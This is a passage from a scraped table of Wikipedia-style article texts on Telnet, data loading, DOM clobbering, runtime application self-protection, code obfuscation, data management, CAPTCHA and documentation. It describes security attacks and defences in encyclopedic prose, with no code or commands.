its users can 'hit' all the keys on that virtual teletype. 13 Essentially, it used an 8 bit channel to exchange 7 bit ASCII data. Any byte with the high bit set was a special Telnet character. On March 5, 1973, a Telnet protocol standard was defined at UCLA 14 with the publication of two NIC documents: Telnet Protocol Specification, NIC 15372, and Telnet Option Specifications, NIC 15373. Many extensions were made for Telnet because of its negotiable options protocol architecture. Some of these extensions have been adopted as Internet standards, IETF documents STD 27 through STD 32. Some extensions have been widely implemented and others are proposed standards on the IETF standards track (see below). The Telnet service is the application providing services over the Telnet protocol. Most operating systems provide a service that can be installed or enabled to provide Telnet services to clients. 15 Telnet is vulnerable to network-based cyberattacks, such as packet sniffing sensitive information including passwords and fingerprinting. 5 16 Telnet services can also be exploited to leak information about the server (such as hostnames, IP addresses and brand) by packet sniffing the banner. This information can then be searched to determine if a Telnet service accepts a connection without authentication. Telnet is also frequently exploited by malware due to being improperly configured. 9 In fact, Telnet is targeted by attackers more frequently than other common protocols, especially when compared to UPnP, CoAP, MQTT, AMQP and XMPP citation needed . Common devices targeted are Internet of things devices, routers and modems. The SANS Institute recommends that the use of Telnet for remote logins should be discontinued under normal circumstances for the following reasons: 17 Extensions to Telnet provide Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication that address the above concerns. 7 However, most Telnet implementations do not support these extensions; and they do not address other vulnerabilities such as parsing the banner information. 16 IBM 5250 or 3270 workstation emulation is supported via custom telnet clients, TN5250 TN3270, and IBM i systems. Clients and servers designed to pass IBM 5250 data streams over Telnet generally do support SSL encryption, as SSH does not include 5250 emulation. Under IBM i (also known as OS 400), port 992 is the default port for secured telnet. 18 Historically, Telnet provided access to a command-line interface on a remote host. However, because of serious security concerns when using Telnet over an open network such as the Internet, its use for this purpose has waned significantly in favor of SSH. 19 The usage of Telnet for remote management has declined rapidly, especially on the public Internet, in favor of the Secure Shell (SSH) protocol. 3 20 SSH provides much of the functionality of telnet, with the addition of strong encryption to prevent sensitive data such as passwords from being intercepted, and public key authentication, to ensure that the remote computer is actually who it claims to be. The Telnet client may be used in debugging network services such as SMTP, IRC, HTTP, FTP or POP3, to issue commands to a server and examine the responses. 15 For example, Telnet client applications can establish an interactive TCP session to a port other than the Telnet server port. However, communication with such ports does not involve the Telnet protocol, because these services merely use a transparent 8 bit TCP connection, because most elements of the telnet protocol were designed around the idea of accessing a command line interface and none of these options or mechanisms is employed in most other internet service connections. For example, a command line telnet client could make an HTTP request to a web server on TCP port 80 as follows: 21 The older protocol is used these days only in rare cases to access decades-old legacy equipment that does not support more modern protocols. 22 For example, a large number of industrial and scientific devices only have Telnet available as a communication option. Some are built with only a standard RS 232 port and use a serial server hardware appliance to provide the translation between the TCP Telnet data and the RS 232 serial data. In such cases, SSH is not an option unless the interface appliance can be configured for SSH (or is replaced with one supporting SSH). Telnet is commonly used by amateur radio operators for providing public information. 23 Despite recommendation against it, security researchers estimated that 7,096,465 exposed systems on the Internet continue to use Telnet as of 2021. However, estimates of this number have varied significantly, depending on the number of ports scanned beyond the default TCP port 23. 9 The technical details of Telnet are defined by a variety of specifications including RFC 854. 4 Telnet commands consist of at least two bytes. 4 The first byte is the IAC escape character (typically byte 255) followed by the byte code for a given command: All data octets except 0xff are transmitted over Telnet as is. (0xff, or 255 in decimal, is the IAC byte (Interpret As Command) which signals that the next byte is a telnet command. The command to insert 0xff into the stream is 0xff, so 0xff must be escaped by doubling it when sending data over the telnet protocol.) 4 Telnet also has a variety of options that terminals implementing Telnet should support. Star Wars: Episode IV A New Hope from 1977 has been recreated as a text art movie served through Telnet. 26 |
190 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template_talk:Data | Talk pages are where people discuss how to make content on Wikipedia the best that it can be. You can use this page to start a discussion with others about how to improve the "Template:Data" page. |
191 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_loading | Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the loading job is the middle step, and the transformed data is loaded in its original format for data transformation in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and that the loading is fast so that the data can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving of much data which can take a long time, and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Tricle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7 |
192 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/DOM_clobbering | In internet security, DOM clobbering (where DOM stands for Document Object Model) is a type of injection attack that revolves around the attacker being able to insert benign non-script HTML code that can be used to influence the execution of JavaScript code. This enables a skilled attacker to perform a variety of unwanted behaviours, including the ability to escalate to arbitrary code execution on the website. While the vulnerability has been known for over a decade, recent efforts to mitigate it completely have been unsuccessful due to a significant amount of usage of the underlying features across the web as of 2021. However, a few defenses have been identified that limit the effects of DOM clobbering and prevent some instances of DOM clobbering from occurring. The DOM clobbering vulnerability arises from a naming collision between the JavaScript execution context and HTML elements in the Document Object Model (DOM). When an undefined JavaScript variable is declared in the same context as an HTML element with the same name or id parameter, the browser will assign the HTML element to the undefined variable. 1 This behaviour can be used to selectively influence the execution of JavaScript by registering HTML elements that coincide with specific variables that affect the execution of the code. In some instances, DOM clobbering can even be used to overshadow legitimate browser APIs by shadowing the property tree using HTML DOM elements. This can lead to the attacker manipulating the execution of various parts of the JavaScript code by injecting specific markup. 2 3 A skilled attacker might be able to perform arbitrary open redirections by overwriting the window.location attribute, cross-site request forgery, or even gain arbitrary code execution via careful manipulation of HTML elements. As part of a study conducted in 2023, Khodayari et al. showed that out of the top 5K websites in the world (as determined by the Tranco list), 9.8% of sites were vulnerable to this attack, including sites like Wikibooks, GitHub, Fandom, and Trello. 4 The existence of DOM clobbering has been known since at least 2010, when a paper from researchers from University of California, Berkeley and Carnegie Mellon University demonstrated an attack where an iframe called self could be used to navigate a page to a different page, violating the same-origin policy. 5 6 Over the years, security researchers have found more sophisticated techniques that have allowed for much more significant impact than what was initially demonstrated. 7 8 While the existence of the attack itself was already known, the term "DOM clobbering" itself did not emerge until 2013, when it was popularized by security researcher Gareth Heyes's blog post demonstrating how the vulnerability could be used to gain arbitrary code execution. 2 In 2015, Heiderich et al. proposed a design for a library called JSAgents, (later DOMPurify) that would be effective at sanitizing markup injection attacks such as those related to cross-site scripting and DOM clobbering. 9 10 11 There has been a resurgence of interest in mitigating this attack in recent years, especially after DOM clobbering vulnerabilities were found in Gmail and Google Analytics in 2020. 12 Over 2020 and 2021, proposals were made at various web standard groups detailing defenses against DOM clobbering by disallowing named access to DOM elements at the browser level. 13 4 However, these proposals were dismissed since after investigating Chrome telemetry data, it was found that over 10.5% of the web relies on the features working as per their current behaviour. 14 4 To demonstrate how a DOM clobbering attack can be used to influence JavaScript execution, the following snippet of JavaScript code is taken as an example: In this simple example, a script element is created and subsequently rendered on the page. However, this simple example is vulnerable to DOM clobbering. An attacker can inject the following HTML via cross-site scripting or other features on the website that might allow for markup injection. This injection will allow the attacker to overwrite the globalUrlConfig variable with a reference to the anchor element, which in turn overwrites the url variable and subsequently the scriptElem.src parameter, (due to the fact that url.href now refers to the href parameter of the anchor element) leading to arbitrary code execution. 15 The threat model for a DOM clobbering attack is similar to that of the web attacker model proposed by Akhawe et al. in 2010. This model assumes that the attacker can send emails or, by some other method, phish the victim to specific pages under their control. The model also assumes that the attacker can inject a limited set of markup into victim websites. This can be done by leveraging other attacks such as cross-site scripting or by abusing rich text rendering features on a web page (for example, Gmail's email reader and WYSIWYG editor). 16 17 This is crucial since DOM clobbering depends on the attacker being able to inject potentially benign HTML into a website. 18 While the optimal defence against DOM clobbering would be to turn off access to named DOM elements, this is currently not feasible due to the significant active usage of these features as per Chrome telemetry data in 2021. 13 14 4 However, various secure coding practices can be used to mitigate the effects of DOM clobbering on JavaScript code execution. 19 One of the most common techniques to limit DOM clobbering attacks is to use HTML sanitization libraries. 20 In 2017, Heiderich et al. proposed a mitigation for DOM clobbering that was subsequently added to the DOMPurify library. The mitigation leveraged the use of hashes of existing functions to determine if HTML elements had overwritten them. In addition, DOMPurify parses the id and name attributes of injected elements to identify if they can collide with existing global functions. 21 However, recent vulnerabilities related to DOM clobbering have been found in DOMPurify and similar libraries such as HTML Janitor, which indicate that these libraries only protect against specific cases of DOM clobbering and are largely unaware of the related risks. 22 23 24 Another popular method to mitigate the effects of DOM clobbering is the use of restrictive Content Security Policies (CSP). 25 While this does not prevent DOM clobbering from altering the execution of already present code, 26 using restrictive content security policies can make it much harder for attackers to elevate a DOM clobbering risk into a arbitrary code execution attack by limiting how scripts can be executed on a website. By leveraging the script-src CSP directive, web developers can restrict where scripts can be loaded to a predetermined set of trusted domains. 25 This thwarts the attacker's ability to load an untrusted attacker-controlled code significantly, if they can compromise the src attribute of a script tag. 27 |
193 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Runtime_application_self-protection | Runtime application self-protection (RASP) is a security technology that uses runtime instrumentation to detect and block computer attacks by taking advantage of information from inside the running software. 1 2 The technology differs from perimeter-based protections such as firewalls, that can only detect and block attacks by using network information without contextual awareness. 3 4 RASP technology is said to improve the security of software by monitoring its inputs, and blocking those that could allow attacks, while protecting the runtime environment from unwanted changes and tampering. 5 RASP-protected applications rely less on external devices like firewalls to provide runtime security protection. When a threat is detected RASP can prevent exploitation and possibly take other actions, including terminating a user's session, shutting the application down, alerting security personnel and sending a warning to the user. 6 7 RASP aims to close the gap left by application security testing and network perimeter controls, neither of which have enough insight into real-time data and event flows to either prevent vulnerabilities slipping through the review process or block new threats that were unforeseen during development. 8 RASP can be integrated as a framework or module that runs in conjunction with a program's codes, libraries and system calls. 5 The technology can also be implemented as a virtualization. 4 RASP is similar to interactive application security testing (IAST), the key difference is that IAST is focused on identifying vulnerabilities within the applications and RASPs are focused protecting against cybersecurity attacks that may take advantages of those vulnerabilities or other attack vectors. 9 RASP solutions can be deployed in two different ways: monitor or protection mode. In monitor mode, the RASP solution reports on web application attacks but does not block any attack. In protection mode, the RASP solution reports and blocks web application attacks. 10 |
194 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Code_obfuscation | In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements. Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic or implicit values embedded in it, primarily, in order to prevent tampering, deter reverse engineering, or even to create a puzzle or recreational challenge for someone reading the source code. This can be done manually or by using an automated tool, the latter being the preferred technique in industry. 1 The architecture and characteristics of some languages may make them easier to obfuscate than others. 2 3 C, 4 C , 5 6 and the Perl programming language 7 are some examples of languages easy to obfuscate. Haskell is also quite obfuscatable 8 despite being quite different in structure. The properties that make a language obfuscatable are not immediately obvious. Types of obfuscations include simple keyword substitution, use or non-use of whitespace to create artistic effects, and self-generating or heavily compressed programs. According to Nick Montfort, techniques may include: A variety of tools exist to perform or assist with code obfuscation. These include experimental research tools created by academics, hobbyist tools, commercial products written by professionals, and open-source software. Deobfuscation tools also exist that attempt to perform the reverse transformation. Although the majority of commercial obfuscation solutions work by transforming either program source code, or platform-independent bytecode as used by Java and .NET, there are also some that work directly on compiled binaries. Writing and reading obfuscated source code can be a brain teaser. A number of programming contests reward the most creatively obfuscated code, such as the International Obfuscated C Code Contest and the Obfuscated Perl Contest. Short obfuscated Perl programs may be used in signatures of Perl programmers. These are JAPHs ("Just another Perl hacker"). 16 Cryptographers have explored the idea of obfuscating code so that reverse-engineering the code is cryptographically hard. This is formalized in the many proposals for indistinguishability obfuscation, a cryptographic primitive that, if possible to build securely, would allow one to construct many other kinds of cryptography, including completely novel types that no one knows how to make. (A stronger notion, black-box obfuscation, is known to be impossible in general.) 17 18 Some anti-virus softwares, such as AVG AntiVirus, 20 will also alert their users when they land on a website with code that is manually obfuscated, as one of the purposes of obfuscation can be to hide malicious code. However, some developers may employ code obfuscation for the purpose of reducing file size or increasing security. The average user may not expect their antivirus software to provide alerts about an otherwise harmless piece of code, especially from trusted corporations, so such a feature may actually deter users from using legitimate software. Mozilla and Google disallow browser extensions containing obfuscated code in their add-ons store. 21 22 There has been debate on whether it is illegal to skirt copyleft software licenses by releasing source code in obfuscated form, such as in cases in which the author is less willing to make the source code available. The issue is addressed in the GNU General Public License by requiring the "preferred form for making modifications" to be made available. 23 The GNU website states "Obfuscated 'source code' is not real source code and does not count as source code. 24 A decompiler can reverse-engineer source code from an executable or library. Decompilation is sometimes called a man-in-the-end (mite) attack, based on the traditional cryptographic attack known as "man-in-the-middle". It puts source code in the hands of the user, although this source code is often difficult to read. The source code is likely to have random function and variable names, incorrect variable types, and use different logic than the original source code (due to compiler optimizations). Model obfuscation is a technique to hide the internal structure of a machine learning model. 25 Obfuscation turns a model into a black box. It is contrary to explainable AI. Obfuscation models can also be applied to training data before feeding it into the model to add random noise. This hides sensitive information about the properties of individual and groups of samples. 26 |
195 | https://en.wikipedia.org/wiki/Data_scraping | https://support.google.com/websearch/answer/86640?hl=en | If a network you use, including VPN networks, seems to be sending automated traffic to Google Search, you might get the message “Our systems have detected unusual traffic from your computer network. The message most likely shows a reCAPTCHA. To confirm that you’re a person and not a robot, solve the reCAPTCHA. After you solve it, the message goes away, and you can use Google again. If you don't get a reCAPTCHA, check if: Learn how to solve a reCAPTCHA. Here's what you can do if you continue to get the "Unusual traffic from your computer network" message: If you administer a network or are an internet service or VPN provider, locate the sources of automated traffic to Google and block them. Once the automated searches have stopped, your users should be able to search normally on Google. Network administrators or others should thoroughly review before they buy IP space from an IP broker. If possible, ask to test the network first to make sure it can access major websites and doesn’t have any existing blocks on it. |
196 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_management | Data management comprises all disciplines related to handling data as a valuable resource, it is the practice of managing an organization's data so it can be analyzed for decision making. 1 The concept of data management arose in the 1980s as technology moved from sequential processing 2 (first punched cards, then magnetic tape) to random access storage. Since it was now possible to store a discrete fact and quickly access it using random access disk technology, those suggesting that data management was more important than business process management used arguments such as "a customer's home address is stored in 75 (or some other large number) places in our computer systems. citation needed However, during this period, random access processing was not competitively fast, so those suggesting "process management" was more important than "data management" used batch processing time as their primary argument. As application software evolved into real-time, interactive usage, it became obvious that both management processes were important. If the data was not well defined, the data would be mis-used in applications. If the process wasn't well defined, it was impossible to meet user needs. Followings are common data management patterns: 3 Topics in data management include: In modern management usage, the term data is increasingly replaced by information or even knowledge in a non-technical context. Thus data management has become information management or knowledge management. This trend obscures the raw data processing and renders interpretation implicit. The distinction between data and derived value is illustrated by the information ladder. However, data has staged a comeback with the popularisation of the term big data, which refers to the collection and analyses of massive sets of data. While big data is a recent phenomenon, the requirement for data to aid decision-making traces back to the early 1970s with the emergence of decision support systems (DSS). These systems can be considered as the initial iteration of data management for decision support. 4 Several organisations have established data management centers (DMC) for their operations. 5 Marketers and marketing organizations have been using data collection and analysis to refine their operations for the last few decades. Marketing departments in organizations and marketing companies conduct data collection and analysis by collecting data from different data sources and analyzing them to come up with insightful data they can use for strategic decision-making (Baier et al., 2012). In the modern business environment, data has evolved into a crucial asset for businesses since businesses use data as a strategic asset that is used regularly to create a competitive advantage and improve customer experiences. Among the most significant forms of data is customer information which is a critical asset used to assess customer behavior and trends and use it for developing new strategies for improving customer experience (Ahmed, 2004). However, data has to be of high quality to be used as a business asset for creating a competitive advantage. Therefore, data governance is a critical element of data collection and analysis since it determines the quality of data while integrity constraints guarantee the reliability of information collected from data sources. Various technologies including Big Data are used by businesses and organizations to allow users to search for specific information from raw data by grouping it based on the preferred criteria marketing departments in organizations could apply for developing targeted marketing strategies (Ahmed, 2004). As technology evolves, new forms of data are being introduced for analysis and classification purposes in marketing organizations and businesses. The introduction of new gadgets such as Smartphones and new-generation PCs has also introduced new data sources from which organizations can collect, analyze and classify data when developing marketing strategies. Retail businesses are the business category that uses customer data from smart devices and websites to understand how their current and targeted customers perceive their services before using the information to make improvements and increase customer satisfaction (Cerchiello and Guidici, 2012). Analyzing customer data is crucial for businesses since it allows marketing teams to understand customer behavior and trends which makes a considerable difference during the development of new marketing campaigns and strategies. Retailers who use customer data from various sources gain an advantage in the market since they can develop data-informed strategies for attracting and retaining customers in the overly competitive business environment. Based on the information on the benefits of data collection and analysis, the following hypotheses are proposed: The sources of data used as the foundation of data collection and analysis have a considerable impact on the data analysis tools used for analyzing and categorizing data. Organizations use various data analysis tools for discovering unknown information and insights from huge databases; this allows organizations to discover new patterns that were not known to them or extract buried information before using it to come up with new patterns and relationships (Ahmed, 2004). There are 2 main categories of data analysis tools, data mining tools and data profiling tools. Also, most commercial data analysis tools are used by organizations for extracting, transforming and loading ETL for data warehouses in a manner that ensures no element is left out during the process (Turban et al., 2008). Thus the data analysis tools are used for supporting the 3 Vs in Big Data: volume, variety and velocity. Factor velocity emerged in the 1980s as one of the most important procedures in data analysis tools which was widely used by organizations for market research. The tools used to select core variables from the data that was collected from various sources and analyzed it; if the amount of data used to be too huge for humans to understand via manual observation, factor analysis would be introduced to distinguish between qualitative and quantitative data (Stewart, 1981). Organizations collect data from numerous sources including websites, emails and customer devices before conducting data analysis. Collecting data from numerous sources and analyzing it using different data analysis tools has its advantages, including overcoming the risk of method bias; using data from different sources and analyzing it using multiple analysis methods guarantees businesses and organizations robust and reliable findings they can use in decision making. On the other hand, researchers use modern technologies to analyze and group data collected from respondents in the form of images, audio and video files by applying algorithms and other analysis software Berry et al., 1997). Researchers and marketers can then use the information obtained from the new generation analysis tools and methods for forecasting, decision support and making estimations for decision making. For instance, information from different data sources on demand forecasts can help a retail business determine the amount of stock required in an upcoming season depending on data from previous seasons. The analysis can allow organizations to make data-informed decisions to gain competitive advantage in an era where all businesses and organizations are capitalizing on emerging technologies and business intelligence tools to gain competitive edges. While there are numerous analysis tools in the market, Big Data analytics is the most common and advanced technology that has led to the following hypothesis: Data analytic tools used to analyze data collected from numerous data sources determine the quality and reliability of data analysis. While organizations need to use quality data collection and analysis tools to guarantee the quality and reliability of the customer data they collect, they must implement security and privacy strategies to protect the data and customer information from privacy leaks (Van Till, 2013). A study conducted by PWC indicated that more than two-thirds of retail customers prefer purchasing products and services from businesses that have data protection and privacy plans for protecting customer information. Also, the study indicated that customers trust businesses that can prove they cannot use customer data for any other purposes other than marketing. As technology and the Internet continue improving, the success of businesses using it as a platform for marketing their products will depend on how effectively they can gain and maintain the trust of customers and users. Therefore, businesses will have to introduce and implement effective data protection and privacy strategies to protect business data and customer privacy. Although developing trust between customers and businesses affects the customers’ purchasing intentions, it also has a considerable impact on long-term purchasing behaviors including how frequently customers purchase which could impact the profitability of a business in the long run. Thus, the above information leads to the following hypothesis: Implementing data security and privacy plans has a positive impact on economic and financial outcomes. Studies indicate that customer transactions account for a 40% increase in the data collected annually, which means that financial data has a considerable impact on business decisions. Therefore, modern organizations are using big data analytics to identify 5 to 10 new data sources that can help them collect and analyze data for improved decision-making. Jonsen (2013) explains that organizations using average analytics technologies are 20% more likely to gain higher returns compared to their competitors who have not introduced any analytics capabilities in their operations. Also, IRI reported that the retail industry could experience an increase of more than $10 billion each year resulting from the implementation of modern analytics technologies. Therefore, the following hypothesis can be proposed: Economic and financial outcomes can impact how organizations use data analytics tools. |
197 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/CAPTCHA | A CAPTCHA ( k p.t KAP-ch ) is a type of challenge response test used in computing to determine whether the user is human in order to deter bot attacks and spam. 1 The term was coined in 2003 by Luis von Ahn, Manuel Blum, Nicholas J. Hopper, and John Langford. 2 It is a contrived acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart. 3 A historically common type of CAPTCHA (displayed as reCAPTCHA v1) was first invented in 1997 by two groups working in parallel. This form of CAPTCHA requires entering a sequence of letters or numbers in a distorted image. Because the test is administered by a computer, in contrast to the standard Turing test that is administered by a human, CAPTCHAs are sometimes described as reverse Turing tests. 4 Two widely used CAPTCHA services are Google's reCAPTCHA 5 6 and the independent hCaptcha. 7 8 It takes the average person approximately 10 seconds to solve a typical CAPTCHA. 9 CAPTCHAs' purpose is to prevent spam on websites, such as promotion spam, registration spam, and data scraping, and bots are less likely to abuse websites with spamming if those websites use CAPTCHA. Many websites use CAPTCHA effectively to prevent bot raiding. CAPTCHAs are designed so that humans can complete them, while most robots cannot. 10 Newer CAPTCHAs look at the user's behaviour on the internet, to prove that they are a human. 11 A normal CAPTCHA test only appears if the user acts like a bot, such as when they request webpages, or click links too fast. Since the 1980s 1990s, users have wanted to make text illegible to computers. 12 The first such people were hackers, posting about sensitive topics to Internet forums they thought were being automatically monitored on keywords. To circumvent such filters, they replaced a word with look-alike characters. HELLO could become 3 () or ) (3 0, and others, such that a filter could not detect all of them. This later became known as leetspeak. 13 One of the earliest commercial uses of CAPTCHAs was in the Gausebeck Levchin test. In 2000, idrive.com began to protect its signup page 14 with a CAPTCHA and prepared to file a patent. 12 In 2001, PayPal used such tests as part of a fraud prevention strategy in which they asked humans to "retype distorted text that programs have difficulty recognizing. 15 PayPal co founder and CTO Max Levchin helped commercialize this use. A popular deployment of CAPTCHA technology, reCAPTCHA, was acquired by Google in 2009. 16 In addition to preventing bot fraud for its users, Google used reCAPTCHA and CAPTCHA technology to digitize the archives of The New York Times and books from Google Books in 2011. 17 Eran Reshef, Gili Raanan and Eilon Solan, who worked at Sanctum on Application Security Firewall, first patented CAPTCHA in 1997. Their patent application details that "The invention is based on applying human advantage in applying sensory and cognitive skills to solving simple problems that prove to be extremely hard for computer software. Such skills include, but are not limited to processing of sensory information such as identification of objects and letters within a noisy graphical environment, signals and speech within an auditory signal, patterns and objects within a video or animation sequence". 18 CAPTCHAs are automated, requiring little human maintenance or intervention to administer, producing benefits in cost and reliability. 19 Modern text-based CAPTCHAs are designed such that they require the simultaneous use of three separate abilities—invariant recognition, segmentation, and parsing to complete the task. 20 Each of these problems poses a significant challenge for a computer, even in isolation. Therefore, these three techniques in tandem make CAPTCHAs difficult for computers to solve. 23 Whilst primarily used for security reasons, CAPTCHAs can also serve as a benchmark task for artificial intelligence technologies. According to an article by Ahn, Blum and Langford, 24 "any program that passes the tests generated by a CAPTCHA can be used to solve a hard unsolved AI problem. 25 They argue that the advantages of using hard AI problems as a means for security are twofold. Either the problem goes unsolved and there remains a reliable method for distinguishing humans from computers, or the problem is solved and a difficult AI problem is resolved along with it. 24 CAPTCHAs based on reading text—or other visual-perception tasks—prevent blind or visually impaired users from accessing the protected resource. 26 27 Because CAPTCHAs are designed to be unreadable by machines, common assistive technology tools such as screen readers cannot interpret them. The use of CAPTCHA thus excludes a small percentage of users from using significant subsets of such common Web-based services as PayPal, Gmail, Orkut, Yahoo , many forum and weblog systems, etc. 28 In certain jurisdictions, site owners could become targets of litigation if they are using CAPTCHAs that discriminate against certain people with disabilities. For example, a CAPTCHA may make a site incompatible with Section 508 in the United States. CAPTCHAs do not have to be visual. Any hard artificial intelligence problem, such as speech recognition, can be used as CAPTCHA. Some implementations of CAPTCHAs permit users to opt for an audio CAPTCHA, such as reCAPTCHA, though a 2011 paper demonstrated a technique for defeating the popular schemes at the time. 29 A method of improving CAPTCHA to ease the work with it was proposed by ProtectWebForm and named "Smart CAPTCHA". 30 Developers are advised to combine CAPTCHA with JavaScript. Since it is hard for most bots to parse and execute JavaScript, a combinatory method which fills the CAPTCHA fields and hides both the image and the field from human eyes was proposed. 31 One alternative method involves displaying to the user a simple mathematical equation and requiring the user to enter the solution as verification. Although these are much easier to defeat using software, they are suitable for scenarios where graphical imagery is not appropriate, and they provide a much higher level of accessibility for blind users than the image-based CAPTCHAs. These are sometimes referred to as MAPTCHAs (M "mathematical"). However, these may be difficult for users with a cognitive disorder, such as dyscalculia. 32 Challenges such as a logic puzzle, or trivia question can also be used as a CAPTCHA. There is research into their resistance against countermeasures. 33 Two main ways to bypass CAPTCHA include using cheap human labor to recognize them, and using machine learning to build an automated solver. 34 According to former Google "click fraud czar" Shuman Ghosemajumder, there are numerous services which solve CAPTCHAs automatically. 35 There was not a systematic methodology for designing or evaluating early CAPTCHAs. 23 As a result, there were many instances in which CAPTCHAs were of a fixed length and therefore automated tasks could be constructed to successfully make educated guesses about where segmentation should take place. Other early CAPTCHAs contained limited sets of words, which made the test much easier to game. Still others example needed made the mistake of relying too heavily on background confusion in the image. In each case, algorithms were created that were successfully able to complete the task by exploiting these design flaws. However, light changes to the CAPTCHA could thwart them. Modern CAPTCHAs like reCAPTCHA rely on present variations of characters that are collapsed together, making them hard to segment, and they have warded off automated tasks. 36 In October 2013, artificial intelligence company Vicarious claimed that it had developed a generic CAPTCHA-solving algorithm that was able to solve modern CAPTCHAs with character recognition rates of up to 90%. 37 However, Luis von Ahn, a pioneer of early CAPTCHA and founder of reCAPTCHA, said: "It's hard for me to be impressed since I see these every few months. 50 similar claims to that of Vicarious had been made since 2003. 38 In August 2014 at Usenix WoOT conference, Bursztein et al. presented the first generic CAPTCHA-solving algorithm based on reinforcement learning and demonstrated its efficiency against many popular CAPTCHA schemas. 36 In October 2018 at ACM CCS'18 conference, Ye et al. presented a deep learning-based attack that could consistently solve all 11 text captcha schemes used by the top 50 popular websites in 2018. An effective CAPTCHA solver can be trained using as few as 500 real CAPTCHAs. 39 It is possible to subvert CAPTCHAs by relaying them to a sweatshop of human operators who are employed to decode CAPTCHAs. A 2005 paper from a W3C working group said that they could verify hundreds per hour. 26 In 2010, the University of California at San Diego conducted a large scale study of CAPTCHA farms. The retail price for solving one million CAPTCHAs was as low as $1,000. 40 Another technique consists of using a script to re-post the target site's CAPTCHA as a CAPTCHA to the attacker's site, which unsuspecting humans visit and solve within a short while for the script to use. 41 42 In 2023, the generative AI chatbot ChatGPT, tricked a TaskRabbit worker to solve a CAPTCHA by telling the worker it was not a robot and had impaired vision. 43 There are multiple Internet companies like 2Captcha and DeathByCaptcha that offer human and machine backed CAPTCHA solving services for as low as US$0.50 per 1000 solved CAPTCHAs. 44 These services offer APIs and libraries that enable users to integrate CAPTCHA circumvention into the tools that CAPTCHAs were designed to block in the first place. 45 Howard Yeend has identified two implementation issues with poorly designed CAPTCHA systems: 46 reusing the session ID of a known CAPTCHA image, and CAPTCHAs residing on shared servers. Sometimes, if part of the software generating the CAPTCHA is client-side (the validation is done on a server but the text that the user is required to identify is rendered on the client side), then users can modify the client to display the un-rendered text. Some CAPTCHA systems use MD5 hashes stored client-side, which may leave the CAPTCHA vulnerable to a brute-force attack. 47 Some researchers have proposed alternatives including image recognition CAPTCHAs which require users to identify simple objects in the images presented. The argument in favor of these schemes is that tasks like object recognition are more complex to perform than text recognition and therefore should be more resilient to machine learning based attacks. Chew et al. published their work in the 7th International Information Security Conference, ISC'04, proposing three different versions of image recognition CAPTCHAs, and validating the proposal with user studies. It is suggested that one of the versions, the anomaly CAPTCHA, is best with 100% of human users being able to pass an anomaly CAPTCHA with at least 90% probability in 42 seconds. 48 Datta et al. published their paper in the ACM Multimedia '05 Conference, named IMAGINATION (IMAge Generation for INternet AuthenticaTION), proposing a systematic way to image recognition CAPTCHAs. Images are distorted so image recognition approaches cannot recognise them. 49 Microsoft (Jeremy Elson, John R. Douceur, Jon Howell, and Jared Saul) claim to have developed Animal Species Image Recognition for Restricting Access (ASIRRA) which ask users to distinguish cats from dogs. Microsoft had a beta version of this for websites to use. 50 They claim "Asirra is easy for users; it can be solved by humans 99.6% of the time in under 30 seconds. Anecdotally, users seemed to find the experience of using Asirra much more enjoyable than a text-based CAPTCHA. This solution was described in a 2007 paper to Proceedings of 14th ACM Conference on Computer and Communications Security (CCS). 51 It was closed in October 2014. 52 |
198 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Documentation | Documentation is any communicable material that is used to describe, explain or instruct regarding some attributes of an object, system or procedure, such as its parts, assembly, installation, maintenance, and use. 1 As a form of knowledge management and knowledge organization, documentation can be provided on paper, online, or on digital or analog media, such as audio tape or CDs. Examples are user guides, white papers, online help, and quick-reference guides. Paper or hard-copy documentation has become less common. citation needed Documentation is often distributed via websites, software products, and other online applications. Documentation as a set of instructional materials shouldn't be confused with documentation science, the study of the recording and retrieval of information. While associated International Organization for Standardization (ISO) standards are not easily available publicly, a guide from other sources for this topic may serve the purpose. 2 3 4 5 Documentation development may involve document drafting, formatting, submitting, reviewing, approving, distributing, reposting and tracking, etc., and are convened by associated standard operating procedure in a regulatory industry. It could also involve creating content from scratch. Documentation should be easy to read and understand. If it is too long and too wordy, it may be misunderstood or ignored. Clear, concise words should be used, and sentences should be limited to a maximum of 15 words. Documentation intended for a general audience should avoid gender-specific terms and cultural biases. In a series of procedures, steps should be clearly numbered. 6 7 8 9 Technical writers and corporate communicators are professionals whose field and work is documentation. Ideally, technical writers have a background in both the subject matter and also in writing, managing content, and information architecture. Technical writers more commonly collaborate with subject-matter experts, such as 